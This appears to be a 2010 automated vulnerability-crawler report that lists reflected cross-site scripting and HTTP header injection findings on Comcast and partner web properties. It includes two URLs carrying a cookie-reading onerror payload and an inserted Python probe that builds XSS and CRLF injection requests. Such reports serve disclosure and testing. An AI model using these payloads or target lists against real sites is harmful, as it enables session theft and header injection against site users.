comcast.com Web Sites, XSS, CWE-79, CWE-113, CAPEC-86

Cross Site Scripting in Comcast Web Properties | Vulnerability Crawler Report

Report generated by XSS.CX at Sun Dec 19 15:35:53 CST 2010.

1. HTTP header injection

1.1. http://www.destinationurl.com/1ab3/dclk.beacon/beacon1 [REST URL parameter 1]

1.2. http://www.destinationurl.com/1ab3/dclk.beaconreceived/ [REST URL parameter 1]
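What the "[REST URL parameter N]" labels in this report mean in practice, as an added example (this is not the XSS.CX crawler's code): parameter N is the N-th non-empty path segment of the URL, counted from 1, and the modified URLs further down the page show the probe shape used, the original segment value followed by a random marker, the payload, and a second random marker. The script below builds such probe URLs for every segment, then applies the two checks the report's section headings name: an unencoded echo of the payload in the body (reflected XSS, CWE-79) and a CRLF that splits a response header (HTTP header injection, CWE-113). The `fetch` callable and `fake_fetch` target are assumptions constructed for this example so it runs offline.

```python
"""Added example (not the XSS.CX crawler's code): the two checks behind the
entries in this report, applied to each "REST URL parameter" of a URL.
A REST URL parameter N is the N-th non-empty path segment, counted from 1,
so in http://www.comcast.net/weather/19103/ parameter 2 is "19103".
`fetch` is a caller-supplied callable (hypothetical interface) returning
(status_line, headers, body); fake_fetch below is a constructed target."""
import html
import re
import secrets
from urllib.parse import quote, unquote, urlsplit, urlunsplit

XSS_PAYLOAD = '"><script>alert(document.cookie)</script>'  # payload seen on this page
HDR_NAME = "X-Injected"                                    # header the CRLF probe adds


def rest_param_count(url):
    return sum(1 for s in urlsplit(url).path.split("/") if s)


def inject_rest_param(url, index, payload, prefix, suffix):
    """Rebuild url with path segment `index` (1-indexed) set to
    original + prefix + payload + suffix.  The payload is percent-encoded
    so the request line stays valid; decoding is left to the server."""
    parts = urlsplit(url)
    segs = parts.path.split("/")
    positions = [i for i, s in enumerate(segs) if s]
    if not 1 <= index <= len(positions):
        raise IndexError(f"URL has only {len(positions)} REST URL parameters")
    i = positions[index - 1]
    segs[i] = segs[i] + prefix + quote(payload, safe="") + suffix
    return urlunsplit(parts._replace(path="/".join(segs)))


def reflected_unencoded(body, prefix, payload, suffix):
    """CWE-79 check: the payload comes back between its markers with
    < > " intact.  An entity-encoded echo (&lt;script&gt;) is not a hit."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    return bool(m) and m.group(1) == payload


def header_injected(headers, value):
    """CWE-113 check: the CRLF in the probe produced a separate response
    header whose value is our random marker."""
    return any(n.lower() == HDR_NAME.lower() and v == value for n, v in headers)


def parse_raw_response(raw):
    """Split a raw HTTP/1.x response into (status_line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def check_rest_params(url, fetch):
    """Probe every path segment with both payloads; return findings as
    (segment_index, issue_name) using the report's own issue names."""
    findings = []
    for idx in range(1, rest_param_count(url) + 1):
        pre, suf = secrets.token_hex(3), secrets.token_hex(5)
        _, _, body = fetch(inject_rest_param(url, idx, XSS_PAYLOAD, pre, suf))
        if reflected_unencoded(body, pre, XSS_PAYLOAD, suf):
            findings.append((idx, "Cross-site scripting (reflected)"))
        # CRLF probe: the marker is the injected header's value, so no suffix
        crlf = f"\r\n{HDR_NAME}: {suf}"
        _, headers, _ = fetch(inject_rest_param(url, idx, crlf, pre, ""))
        if header_injected(headers, suf):
            findings.append((idx, "HTTP header injection"))
    return findings


def fake_fetch(url):
    """Constructed stand-in for a target (not a real server): segment 1 is
    HTML-escaped in the page but copied verbatim into a Location header
    (header injection); segment 2 is echoed raw into the page (XSS)."""
    segs = [unquote(s) for s in urlsplit(url).path.split("/") if s] + ["", ""]
    seg1, seg2 = segs[0], segs[1]
    raw = ("HTTP/1.1 200 OK\r\n"
           "Content-Type: text/html\r\n"
           f"Location: http://www.example.test/{seg1}\r\n"
           "\r\n"
           f"<h1>{html.escape(seg1)}</h1><p>Zip: {seg2}</p>")
    return parse_raw_response(raw)


if __name__ == "__main__":
    for idx, issue in check_rest_params("http://www.comcast.net/weather/19103/", fake_fetch):
        print(f"{issue} [REST URL parameter {idx}]")
```

Against the constructed target this prints one header-injection finding for parameter 1 and one reflected-XSS finding for parameter 2, the same two labels the report uses. The random markers matter: without them a payload that happens to be present in the page for another reason (a cached earlier probe, a shared template) would be counted as a reflection, and checking the exact header value rather than just the header name keeps a server that already sends a header of that name from producing a false CWE-113 hit.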

2. Cross-site scripting (reflected)

2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

2.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

2.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

2.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

2.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

2.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

2.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

2.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

2.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

2.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

2.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

2.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

2.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

2.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

2.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]

2.17. http://customer.comcast.com/Pages/FAQViewer.aspx [name of an arbitrarily supplied request parameter]

2.18. http://customer.comcast.com/Pages/Help.aspx [name of an arbitrarily supplied request parameter]

2.19. http://digg.com/submit [REST URL parameter 1]

2.20. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 3]

2.21. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 4]

2.22. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 5]

2.23. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 6]

2.24. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 7]

2.25. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 8]

2.26. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 9]

2.27. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 3]

2.28. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 4]

2.29. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 5]

2.30. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 6]

2.31. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 7]

2.32. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 8]

2.33. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 9]

2.34. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 3]

2.35. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 4]

2.36. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 5]

2.37. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 6]

2.38. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 7]

2.39. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 8]

2.40. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 9]

2.41. http://games.comcast.net/product_webgame.php [REST URL parameter 1]

2.42. http://games.comcast.net/product_webgame.php [name of an arbitrarily supplied request parameter]

2.43. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

2.44. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]

2.45. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 2]

2.46. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

2.47. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]

2.48. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 2]

2.49. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

2.50. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 1]

2.51. http://games.comcast.net/t_03cm/s1_1050_13675/DownloadableGames/Puzzle/Atlantis-Bundle.html [REST URL parameter 2]

2.52. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

2.53. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 1]

2.54. http://games.comcast.net/t_03cm/s1_1052_14739/DownloadableGames/Action/Press-Your-LuckTM.html [REST URL parameter 2]

2.55. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 1]

2.56. http://games.comcast.net/t_03cm/s2/WebGames [REST URL parameter 2]

2.57. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 1]

2.58. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 2]

2.59. http://moving.move.com/Move/Moving/Default.asp [name of an arbitrarily supplied request parameter]

2.60. http://moving.move.com/move/ [name of an arbitrarily supplied request parameter]

2.61. http://moving.move.com/move/default.asp [name of an arbitrarily supplied request parameter]

2.62. http://newhomes.move.com/ [name of an arbitrarily supplied request parameter]

2.63. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

2.64. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

2.65. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

2.66. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

2.67. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

2.68. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

2.69. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

2.70. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

2.71. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

2.72. http://newhomes.move.com/comcast/communityresults/market-177 [name of an arbitrarily supplied request parameter]

2.73. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

2.74. http://newhomes.move.com/comcast/communityresults/market-18 [name of an arbitrarily supplied request parameter]

2.75. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

2.76. http://newhomes.move.com/comcast/communityresults/market-18/city-avondale [name of an arbitrarily supplied request parameter]

2.77. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

2.78. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]

2.79. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

2.80. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]

2.81. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

2.82. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]

2.83. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

2.84. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]

2.85. http://newhomesresource.move.com/home/default.asp [name of an arbitrarily supplied request parameter]

2.86. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.87. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.88. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.89. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

2.90. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.91. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.92. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.93. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.94. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

2.95. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.96. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.97. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.98. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.99. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.100. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.101. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.102. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.103. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.104. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.105. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.106. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.107. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.108. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.109. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

2.110. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.111. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

2.112. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.113. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

2.114. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.115. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

2.116. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.117. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

2.118. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

2.119. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [REST URL parameter 4]

2.120. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [name of an arbitrarily supplied request parameter]

2.121. http://signup.comcast.net/identity/reg [name of an arbitrarily supplied request parameter]

2.122. http://tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

2.123. http://web.sny.tv/fan_zone/messageboard/ [name of an arbitrarily supplied request parameter]

2.124. http://web.sny.tv/media/video.jsp [name of an arbitrarily supplied request parameter]

2.125. http://web.sny.tv/news/archive.jsp [name of an arbitrarily supplied request parameter]

2.126. http://web.sny.tv/news/columnist.jsp [name of an arbitrarily supplied request parameter]

2.127. http://web.sny.tv/search/media.jsp [name of an arbitrarily supplied request parameter]

2.128. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.129. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.130. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.131. http://www.autotrader.com/ [name of an arbitrarily supplied request parameter]

2.132. http://www.bankrate.com/compare-rates.aspx [name of an arbitrarily supplied request parameter]

2.133. http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx [name of an arbitrarily supplied request parameter]

2.134. http://www.comcast.net/articles/entertainment-eonline/20101219/b217076/ [REST URL parameter 2]

2.135. http://www.comcast.net/articles/entertainment-movies/20101217/US.People.Randy.Quaid/ [REST URL parameter 2]

2.136. http://www.comcast.net/articles/entertainment/20090708/entertainment.slideshows.001/ [REST URL parameter 2]

2.137. http://www.comcast.net/articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/ [REST URL parameter 2]

2.138. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.139. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.140. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

2.141. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.142. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.143. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

2.144. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.145. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.146. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

2.147. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.148. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.149. http://www.comcast.net/articles/sports-nfl/20101219/Jaguars-Colts.Inactives/ [REST URL parameter 2]

2.150. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.151. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.152. http://www.comcast.net/entertainment/reelnews [REST URL parameter 2]

2.153. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

2.154. http://www.comcast.net/finance/forwhatitsworth/6470358/outrageousceoperksthisyearstoppicks/ [REST URL parameter 2]

2.155. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

2.156. http://www.comcast.net/finance/taxcenter/ [REST URL parameter 2]

2.157. http://www.comcast.net/local/19103/ [REST URL parameter 2]

2.158. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.159. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.160. http://www.comcast.net/news/national/ [REST URL parameter 2]

2.161. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.162. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.163. http://www.comcast.net/news/odd/ [REST URL parameter 2]

2.164. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.165. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.166. http://www.comcast.net/news/politics/ [REST URL parameter 2]

2.167. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.168. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.169. http://www.comcast.net/news/world/ [REST URL parameter 2]

2.170. http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/ [REST URL parameter 2]

2.171. http://www.comcast.net/slideshow/finance-branddisasters/ [REST URL parameter 2]

2.172. http://www.comcast.net/slideshow/music-greenday [REST URL parameter 2]

2.173. http://www.comcast.net/slideshow/news-spacepictures [REST URL parameter 2]

2.174. http://www.comcast.net/slideshow/sports-bestdressedathletes/ [REST URL parameter 2]

2.175. http://www.comcast.net/weather/19103/ [REST URL parameter 2]

2.176. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/a [REST URL parameter 2]

2.177. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ [REST URL parameter 2]

2.178. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 1]

2.179. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 2]

2.180. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 3]

2.181. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 4]

